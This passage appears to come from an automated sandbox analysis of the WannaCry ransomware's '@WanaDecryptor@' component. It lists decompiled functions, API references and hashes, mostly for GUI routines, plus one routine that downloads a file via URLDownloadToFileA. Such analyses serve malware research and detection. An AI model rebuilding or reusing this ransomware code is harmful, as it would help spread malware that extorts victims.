                                                      • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
                                                      • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
                                                      • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#823
                                                      • String ID:
                                                      • API String ID: 3019263841-0
                                                      • Opcode ID: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                                      • Instruction ID: af0acaa543f5011fd428c8da5e8f88cfa40878c60dbd15804793c53c70a14286
                                                      • Opcode Fuzzy Hash: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                                      • Instruction Fuzzy Hash: 4A41B570644341EBD220DF65CC85F5BB7A8BF84724F104B2DF5247B2D1C7B4A9098BAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
                                                      				signed int _v0;
                                                      				char _v4;
                                                      				char _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				signed int _t29;
                                                      				intOrPtr _t31;
                                                      				long _t36;
                                                      				intOrPtr _t38;
                                                      				intOrPtr* _t41;
                                                      				struct HWND__* _t47;
                                                      				intOrPtr _t48;
                                                      				long _t53;
                                                      				struct HWND__* _t58;
                                                      				signed int _t60;
                                                      				intOrPtr* _t67;
                                                      				signed int _t68;
                                                      
                                                      				_t67 = __ecx;
                                                      				L00412FE6();
                                                      				_t68 = __eax;
                                                      				if((__eax & 0x00008000) != 0) {
                                                      					_push( &_v8);
                                                      					_push( &_v4);
                                                      					L00412FFE();
                                                      					if(_a4 == 0) {
                                                      						_t60 = _v0;
                                                      						_t41 = _v16;
                                                      					} else {
                                                      						_t58 =  *(__ecx + 0x20);
                                                      						_t36 = SendMessageA(_t58, 0x408, 0, 0);
                                                      						_t41 = _v16;
                                                      						_t53 = _t36;
                                                      						if(_t53 == _t41) {
                                                      							_t38 =  *((intOrPtr*)(_t67 + 0x68));
                                                      							_t58 =  *(_t67 + 0x6c);
                                                      							if(_t53 - _t38 < _t58) {
                                                      								_t53 = _t58 + _t38;
                                                      							}
                                                      						}
                                                      						asm("cdq");
                                                      						_t60 = (_v0 ^ _t58) - _t58 + _t53;
                                                      					}
                                                      					_t47 =  *(_t67 + 0x6c);
                                                      					_t29 = _t47 + _t41;
                                                      					if(_t60 <= _t29) {
                                                      						if(_t60 >= _t41) {
                                                      							InvalidateRect( *(_t67 + 0x20), 0, 1);
                                                      						}
                                                      					} else {
                                                      						_t60 = _t60 + _v12 - _t47 - _t41;
                                                      						if(_t60 > _t29) {
                                                      							_t60 = _t29;
                                                      						}
                                                      						_push(0);
                                                      						if((_t68 & 0x00004000) == 0) {
                                                      							_push(0x4000);
                                                      							_push(0);
                                                      							L00412DDC();
                                                      						} else {
                                                      							_push(0);
                                                      							_push(0x4000);
                                                      							L00412DDC();
                                                      						}
                                                      					}
                                                      					_t48 = _v12;
                                                      					_t31 = _t60 -  *(_t67 + 0x6c);
                                                      					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
                                                      					if(_t31 < _t48) {
                                                      						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
                                                      					}
                                                      					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
                                                      					return 1;
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}

                                                      APIs
                                                      • #3797.MFC42 ref: 00409C27
                                                      • #6734.MFC42(?,?), ref: 00409C4E
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
                                                      • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3797#4284#6734MessageSend
                                                      • String ID:
                                                      • API String ID: 1776784669-0
                                                      • Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                                      • Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
                                                      • Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                                      • Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				void* _v4;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v24;
                                                      				void* __ebx;
                                                      				intOrPtr* _t21;
                                                      				intOrPtr* _t23;
                                                      				intOrPtr _t25;
                                                      				intOrPtr _t26;
                                                      				intOrPtr* _t33;
                                                      				signed int _t42;
                                                      				unsigned int _t44;
                                                      				signed int _t45;
                                                      				void* _t53;
                                                      				intOrPtr _t65;
                                                      				void* _t67;
                                                      				intOrPtr _t68;
                                                      				void* _t69;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041438B);
                                                      				_t21 =  *[fs:0x0];
                                                      				_push(_t21);
                                                      				 *[fs:0x0] = _t68;
                                                      				_push(__ecx);
                                                      				_push(0x244);
                                                      				L00412CEC();
                                                      				_t33 = _t21;
                                                      				_t69 = _t68 + 4;
                                                      				_v16 = _t33;
                                                      				_t53 = 0;
                                                      				_v4 = 0;
                                                      				if(_t33 == 0) {
                                                      					_t33 = 0;
                                                      				} else {
                                                      					_t65 = _a16;
                                                      					 *_t33 = 0;
                                                      					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
                                                      					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
                                                      					 *((intOrPtr*)(_t33 + 0x138)) = 0;
                                                      					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
                                                      					if(_t65 != 0) {
                                                      						asm("repne scasb");
                                                      						_t42 =  !(__ecx | 0xffffffff);
                                                      						_push(_t42);
                                                      						L00412CEC();
                                                      						 *((intOrPtr*)(_t33 + 0x138)) = 0;
                                                      						asm("repne scasb");
                                                      						_t44 =  !(_t42 | 0xffffffff);
                                                      						_t67 = _t65 - _t44;
                                                      						_t45 = _t44 >> 2;
                                                      						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
                                                      						_t69 = _t69 + 0x1c;
                                                      						_t53 = 0;
                                                      					}
                                                      				}
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_v4 = 0xffffffff;
                                                      				_t23 = E00411C00(_t33);
                                                      				 *0x4220dc = _t23;
                                                      				if(_t23 == _t53) {
                                                      					_push(8);
                                                      					L00412CEC();
                                                      					 *_t23 = 1;
                                                      					 *((intOrPtr*)(_t23 + 4)) = _t33;
                                                      					 *[fs:0x0] = _v24;
                                                      					return _t23;
                                                      				} else {
                                                      					if(_t33 != _t53) {
                                                      						_t25 =  *((intOrPtr*)(_t33 + 0x138));
                                                      						if(_t25 != _t53) {
                                                      							_push(_t25);
                                                      							L00412C98();
                                                      							_t69 = _t69 + 4;
                                                      						}
                                                      						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
                                                      						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
                                                      						if(_t26 != _t53) {
                                                      							_push(_t26);
                                                      							L00412C98();
                                                      							_t69 = _t69 + 4;
                                                      						}
                                                      						_push(_t33);
                                                      						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
                                                      						L00412C98();
                                                      						_t69 = _t69 + 4;
                                                      					}
                                                      					 *[fs:0x0] = _v24;
                                                      					return 0;
                                                      				}
                                                      			}





















                                                      APIs
                                                      • #823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
                                                      • #823.MFC42(?,?,?), ref: 00412849
                                                      • #825.MFC42(?), ref: 004128B5
                                                      • #825.MFC42(?), ref: 004128CE
                                                      • #825.MFC42(00000000), ref: 004128DD
                                                      • #823.MFC42(00000008), ref: 004128FA
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #823#825
                                                      • String ID:
                                                      • API String ID: 89657779-0
                                                      • Opcode ID: 2789b4e0e235f4ab8dcea02542dbd19971487fc096c6531db9c1eddfb55465f8
                                                      • Instruction ID: dc1b5eec0fc78afcb49772100b5c76d6e8760601cde25cb5382a27e7a1041640
                                                      • Opcode Fuzzy Hash: 2789b4e0e235f4ab8dcea02542dbd19971487fc096c6531db9c1eddfb55465f8
                                                      • Instruction Fuzzy Hash: 8631A5B16006008BDB149F2E8D8169BB6D5FBC4720F18473EF929CB3C1EBB99951C755
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 61%
                                                      			E0040B780(signed int __ecx, CHAR* _a4, char* _a8) {
                                                      				intOrPtr _v12;
                                                      				void _v259;
                                                      				char _v260;
                                                      				char _v264;
                                                      				char _v284;
                                                      				char _t15;
                                                      				int _t19;
                                                      				CHAR* _t25;
                                                      				signed int _t26;
                                                      				char* _t40;
                                                      
                                                      				_t26 = __ecx;
                                                      				_t25 = _a4;
                                                      				CreateDirectoryA(_t25, 0);
                                                      				_t40 = _a8;
                                                      				asm("repne scasb");
                                                      				if( !(_t26 | 0xffffffff) == 1) {
                                                      					L4:
                                                      					return 0;
                                                      				} else {
                                                      					_t15 =  *0x421798; // 0x0
                                                      					_v260 = _t15;
                                                      					memset( &_v259, 0, 0x40 << 2);
                                                      					asm("stosw");
                                                      					asm("stosb");
                                                      					GetTempFileNameA(_t25, "t", 0,  &_v260);
                                                      					_t19 = DeleteUrlCacheEntry(_t40);
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push( &_v264);
                                                      					_push(_t40);
                                                      					_push(0);
                                                      					L004133CE();
                                                      					if(_t19 != 0 || E0040B6A0(_t25,  &_v284, _v12) == 0) {
                                                      						DeleteFileA( &_v284);
                                                      						goto L4;
                                                      					} else {
                                                      						DeleteFileA( &_v284);
                                                      						return 1;
                                                      					}
                                                      				}
                                                      			}














                                                      APIs
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000428), ref: 0040B793
                                                      • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                                      • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                                      • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B815
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B82C
                                                        • Part of subcall function 0040B6A0: CreateDirectoryA.KERNELBASE(?,00000000,?,76E83310,00000000,00000428), ref: 0040B6B4
                                                        • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete$CreateDirectory$CacheDownloadEntryNameTemp
                                                      • String ID:
                                                      • API String ID: 361195595-0
                                                      • Opcode ID: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                                      • Instruction ID: f6bba9489874f0a6e7d9c3b0bbe4d647d3eb1ae806ee8fe5932772f512dcd3e1
                                                      • Opcode Fuzzy Hash: bc206aeca14df8ea71a261a63474c4c6f919be589c915fc96ea8b3c1b6d46284
                                                      • Instruction Fuzzy Hash: 24112B76100300BBE7209B60DC85FEB379CEBC4321F00C82DF659921D1DB79550987EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00409A40(signed int* _a4, intOrPtr _a8) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr* _v24;
                                                      				struct tagRECT _v40;
                                                      				intOrPtr _v56;
                                                      				intOrPtr _v64;
                                                      				char _v68;
                                                      				intOrPtr _v88;
                                                      				intOrPtr _t34;
                                                      				void* _t35;
                                                      				void* _t53;
                                                      				intOrPtr _t56;
                                                      
                                                      				 *[fs:0x0] = _t56;
                                                      				_v40.right = 0;
                                                      				_v40.top = 0x41679c;
                                                      				_v4 = 0;
                                                      				E00409D40( &(_v40.bottom), _a4, _a8);
                                                      				OffsetRect( &_v40,  ~( *_a4),  ~(_a4[1]));
                                                      				L00412D5E();
                                                      				L00413010();
                                                      				_t34 =  *_v24;
                                                      				_t35 =  *((intOrPtr*)( *( *_a4) + 0x64))(0, 0, _t34,  *((intOrPtr*)(_t34 - 8)),  &_v68, CreateRectRgn(_v40, _v40.top, _v40.right, _v40.bottom), _t53,  *[fs:0x0], E00414220, 0xffffffff);
                                                      				L00412D52();
                                                      				_v88 = 0x415c00;
                                                      				_v56 = 1;
                                                      				L00412D52();
                                                      				 *[fs:0x0] = _v64;
                                                      				return _t35;
                                                      			}















                                                      APIs
                                                      • OffsetRect.USER32(?,?,?), ref: 00409A9B
                                                      • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
                                                      • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
                                                      • #5781.MFC42(0041679C,00000000), ref: 00409ACC
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414Rect$#1641#5781CreateOffset
                                                      • String ID:
                                                      • API String ID: 2675356817-0
                                                      • Opcode ID: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                                      • Instruction ID: 08eaaa51a6c0e03944d0349f6c05153d0be232de021c7e29130ffbf32961e4dd
                                                      • Opcode Fuzzy Hash: 70d65907dd93b2958bf6993a897855ede509dea79e6a3755aa7cf1b2bfcc5a2d
                                                      • Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E004034A0(void* __ecx) {
                                                      				intOrPtr _v0;
                                                      				int _v8;
                                                      				struct tagRECT _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				char _v40;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v72;
                                                      				char* _t20;
                                                      				int _t23;
                                                      				void* _t45;
                                                      				intOrPtr _t48;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413620);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t48;
                                                      				_t45 = __ecx;
                                                      				GetClientRect( *(__ecx + 0x20),  &_v28);
                                                      				_push( *((intOrPtr*)(_t45 + 0xe8)));
                                                      				L00412D76();
                                                      				_t20 =  &_v40;
                                                      				_push(_t20);
                                                      				_v8 = 0;
                                                      				L00412D70();
                                                      				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                                      				_push(_t20);
                                                      				L00412D70();
                                                      				_v72 = 0x415c00;
                                                      				_v40 = 1;
                                                      				L00412D52();
                                                      				 *[fs:0x0] = _v48;
                                                      				return _t23;
                                                      			}
















                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                                      • Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
                                                      • Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                                      • Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00406940(void* __ecx) {
                                                      				intOrPtr _v0;
                                                      				int _v8;
                                                      				struct tagRECT _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				char _v40;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v72;
                                                      				char* _t20;
                                                      				int _t23;
                                                      				void* _t45;
                                                      				intOrPtr _t48;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413E30);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t48;
                                                      				_t45 = __ecx;
                                                      				GetClientRect( *(__ecx + 0x20),  &_v28);
                                                      				_push( *((intOrPtr*)(_t45 + 0x824)));
                                                      				L00412D76();
                                                      				_t20 =  &_v40;
                                                      				_push(_t20);
                                                      				_v8 = 0;
                                                      				L00412D70();
                                                      				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                                      				_push(_t20);
                                                      				L00412D70();
                                                      				_v72 = 0x415c00;
                                                      				_v40 = 1;
                                                      				L00412D52();
                                                      				 *[fs:0x0] = _v48;
                                                      				return _t23;
                                                      			}


                                                      APIs
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                                      • Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
                                                      • Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                                      • Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00404EB0(void* __ecx) {
                                                      				intOrPtr _v0;
                                                      				int _v8;
                                                      				struct tagRECT _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				char _v40;
                                                      				intOrPtr _v48;
                                                      				intOrPtr _v72;
                                                      				char* _t20;
                                                      				int _t23;
                                                      				void* _t45;
                                                      				intOrPtr _t48;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413870);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t48;
                                                      				_t45 = __ecx;
                                                      				GetClientRect( *(__ecx + 0x20),  &_v28);
                                                      				_push( *((intOrPtr*)(_t45 + 0x6c)));
                                                      				L00412D76();
                                                      				_t20 =  &_v40;
                                                      				_push(_t20);
                                                      				_v8 = 0;
                                                      				L00412D70();
                                                      				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
                                                      				_push(_t20);
                                                      				L00412D70();
                                                      				_v72 = 0x415c00;
                                                      				_v40 = 1;
                                                      				L00412D52();
                                                      				 *[fs:0x0] = _v48;
                                                      				return _t23;
                                                      			}


                                                      APIs
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#2414#283ClientRect
                                                      • String ID:
                                                      • API String ID: 3728838672-0
                                                      • Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                                      • Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
                                                      • Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                                      • Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E00404310(void* __ecx) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v40;
                                                      				intOrPtr _v48;
                                                      				void* _v96;
                                                      				void* _v100;
                                                      				void* _v104;
                                                      				void* _v108;
                                                      				intOrPtr _v112;
                                                      				void* _v128;
                                                      				void* _v132;
                                                      				void* _t20;
                                                      				void* _t22;
                                                      				void* _t39;
                                                      				intOrPtr _t40;
                                                      				intOrPtr _t42;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004137A8);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t42;
                                                      				_t39 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
                                                      					E004044C0(__ecx, 0);
                                                      				}
                                                      				L00412DD0();
                                                      				_t20 = _t39 + 0x48;
                                                      				_v8 = 0;
                                                      				L00412DCA();
                                                      				L00412DC4();
                                                      				L00412DBE();
                                                      				_t40 =  *((intOrPtr*)(_t39 + 0x40));
                                                      				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
                                                      				_push(_t20);
                                                      				L00412DCA();
                                                      				_v40 = 0xffffffff;
                                                      				L00412DB8();
                                                      				 *[fs:0x0] = _v48;
                                                      				return _t22;
                                                      			}


                                                      APIs
                                                      • #470.MFC42(?,00000000), ref: 0040433F
                                                      • #5789.MFC42 ref: 00404354
                                                      • #5875.MFC42(00000001), ref: 00404361
                                                      • #6172.MFC42(?,00000001), ref: 0040436E
                                                      • #5789.MFC42(00000000), ref: 0040438F
                                                      • #755.MFC42(00000000), ref: 004043A0
                                                        • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
                                                        • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
                                                        • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                                        • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
                                                        • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                                        • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
                                                        • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
                                                      • String ID:
                                                      • API String ID: 3301245081-0
                                                      • Opcode ID: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                                      • Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
                                                      • Opcode Fuzzy Hash: fc0b145fd5a230e1fb0a5d7e30a8fbc0e65b4b60cc0ead88fd739261a0b8085f
                                                      • Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 46%
                                                      			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
                                                      				intOrPtr _t9;
                                                      
                                                      				_t9 = _a4;
                                                      				_push(_t9);
                                                      				_push(0x407);
                                                      				L00412CE6();
                                                      				L00412D88();
                                                      				_push(_t9);
                                                      				_push(0x408);
                                                      				L00412CE6();
                                                      				L00412D88();
                                                      				_push(_t9);
                                                      				_push(2);
                                                      				L00412CE6();
                                                      				L00412D88();
                                                      				return __eax;
                                                      			}





                                                      APIs
                                                      • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                                      • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                                      • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                                      • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                                      • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                                      • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2642#3092
                                                      • String ID:
                                                      • API String ID: 2547810013-0
                                                      • Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                                      • Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
                                                      • Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                                      • Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 89%
                                                      			E00406EF0(void* __ecx, char* _a4, void** _a8) {
                                                      				char* _v4;
                                                      				char _v8;
                                                      				void* _v12;
                                                      				char* _t14;
                                                      				char _t15;
                                                      				char* _t17;
